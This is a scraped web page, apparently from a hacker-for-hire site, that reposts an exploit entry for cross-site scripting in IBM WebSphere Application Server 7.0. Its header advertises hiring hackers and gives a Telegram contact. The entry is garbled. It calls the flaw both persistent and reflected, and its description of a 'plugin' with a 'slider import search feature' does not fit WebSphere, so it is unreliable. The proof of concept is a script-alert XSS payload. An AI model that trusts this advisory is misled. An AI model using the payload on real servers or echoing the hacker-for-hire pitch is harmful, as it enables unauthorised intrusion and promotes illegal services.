Data center: Ashburn, VA

Telegram Chat : MBHH_x86

Email Us:

Mobile Hacker For Hire, hire a hacker, hiring a hacker, hacker with proof

IBM Websphere Application Server 7.0 Cross Site Scripting ≈ Packet Storm

Table of Contents

# Exploit Title: IBM Websphere Application Server 7.0 - Persistent Cross-Site Scripting (Authenticated)
# Date: 2022-12-02
# Author: Milad karimi
# Software Link:
# Version: 7.0
# Tested on: Windows 10
# CVE: 2009-0855

1. Description:
This plugin creates a IBM Websphere Application Server from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.

2. Proof of Concept:<script>alert('Ex3ptionaL_XSS')</script><script>alert('Ex3ptionaL_XSS')</script>.jsp

Leave a Reply

Your email address will not be published. Required fields are marked *

error: Content is protected !!